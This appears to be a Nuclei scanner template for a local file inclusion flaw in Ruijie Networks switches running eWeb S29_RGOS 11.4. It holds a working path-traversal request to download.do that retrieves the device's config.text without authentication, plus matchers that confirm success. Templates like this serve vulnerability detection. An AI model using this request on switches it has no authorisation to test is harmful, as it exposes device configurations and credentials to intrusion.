id: ruijie-networks-lfi

info:
  name: Ruijie Networks Switch eWeb S29_RGOS 11.4 - Local File Inclusion
  author: pikpikcu
  severity: high
  description: Ruijie Networks Switch eWeb S29_RGOS 11.4 is vulnerable to local file inclusion and allows remote unauthenticated attackers to access locally stored files and retrieve their content via the 'download.do' endpoint.
  reference:
    - https://exploit-db.com/exploits/48755
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  tags: ruijie,lfi,edb

requests:
  - method: GET
    path:
      - "{{BaseURL}}/download.do?file=../../../../config.text"
    matchers-condition: and
    matchers:

      - type: word
        words:
          - 'filename="config.text"'
          - "Content-Type: application/octet-stream"
        part: header
      - type: word
        words:
          - "version S29_RGOS 11.4"
        part: body
        condition: and

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/08/04
